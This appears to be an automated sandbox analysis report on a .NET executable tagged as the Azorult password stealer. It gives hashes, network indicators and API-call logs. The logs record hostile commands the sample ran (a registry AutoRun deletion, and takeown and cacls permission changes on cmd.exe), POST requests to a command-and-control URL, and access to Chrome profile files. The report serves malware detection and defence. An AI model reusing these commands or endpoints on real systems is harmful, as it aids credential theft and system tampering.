popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

rxtygf.exe

.NET framework(MSIL) Admin Tool (Sysinternals etc ...) Malicious Library HTTP Escalate priviledges Internet API Http API AntiDebug PE File PE32 .NET EXE AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us July 18, 2023, 7:16 a.m. July 18, 2023, 7:25 a.m.
Size 387.0KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 ad607f046a6f855f06d0e7b2cab189c1
SHA256 552719d9dda2789ec880ab52ba8c7e695b631d6fab6d56474b4b6a4f8fe4c21e
CRC32 79FF024D
ssdeep 6144:VZVgqnvYmMKNLgYApEBQh9jToGZaFROm7kv6KreTqH6F:VZ+qnwSg/ECh9jTH3iGreTjF
Yara
  • Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult
  • Admin_Tool_IN_Zero - Admin Tool Sysinternals
  • Is_DotNET_EXE - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
whyers.io
A 104.21.76.77
A 172.67.191.103
172.67.191.103
api.ipify.org
A 64.185.227.156
CNAME api4.ipify.org
A 104.237.62.211
A 173.231.16.76
64.185.227.156
IP Address Status Action
104.21.76.77 Active Moloch
164.124.101.2 Active Moloch
173.231.16.76 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49509 -> 104.21.76.77:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49508 -> 173.231.16.76:80 2021997 ET POLICY External IP Lookup api.ipify.org Device Retrieving External IP Address Detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49509
104.21.76.77:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=whyers.io b5:70:31:dc:b0:cd:7d:e9:af:71:21:ec:4b:e6:97:ce:e4:da:a6:57

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: reg
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: takeown
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /f C:\Windows\system32\cmd.exe /a
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: echo
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: cacls
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Windows\system32\cmd.exe /g Administrators:f
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: echo
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: cacls
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Windows\system32\cmd.exe /e /g Users:r
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: echo
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: cacls
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Windows\system32\cmd.exe /e /g Administrators:r
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: echo
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: cacls
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Windows\system32\cmd.exe /e /d SERVICE
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: echo
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: cacls
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Windows\system32\cmd.exe /e /d mssqlserver
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: echo
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: cacls
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Windows\system32\cmd.exe /e /d "network service"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: echo
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: cacls
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Windows\system32\cmd.exe /e /g system:r
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: echo
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: cacls
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: takeown
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /f C:\Windows\SysWOW64\cmd.exe /a
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00531580
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00531680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00531680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header suspicious_request GET http://api.ipify.org/
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST https://whyers.io/QWEwqdsvsf/ap.php
request GET http://api.ipify.org/
request POST https://whyers.io/QWEwqdsvsf/ap.php
request POST https://whyers.io/QWEwqdsvsf/ap.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 1835008
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00710000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00890000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f31000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f32000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00710000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00760000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00492000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00605000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0060b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00607000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00730000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0049a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005f7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00731000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00734000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0049c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00735000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00736000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00737000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 24576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0073a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b51000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b53000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00891000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b54000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 28672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b55000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b5d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b5e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b5f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004ad000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x051f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x051f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x051f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x051f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x051f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x051f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x051f7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x051f8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x051fc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x051fd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 38400
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06770400
process_handle: 0xffffffff
3221225550 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x051fe000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x051ff000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06830000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 9933119488
free_bytes_available: 9933119488
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 75309056
free_bytes_available: 75309056
root_path: E:
total_number_of_bytes: 104853504
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 9933086720
free_bytes_available: 0
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 0
root_path: D:\
total_number_of_bytes: 0
0 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 75304960
free_bytes_available: 0
root_path: E:\
total_number_of_bytes: 104853504
1 1 0
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\QuotaManager-journal
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOCK
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_0
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\000003.log
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\index-dir
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000003.log
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Origin Bound Certs
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\000003.log
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Preferences
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\reports\8dc74f67-39b6-4058-9ac1-6f782fcd0d62.dmp
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOCK
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Last Session
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache\index
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\index.txt
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Favicons
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG
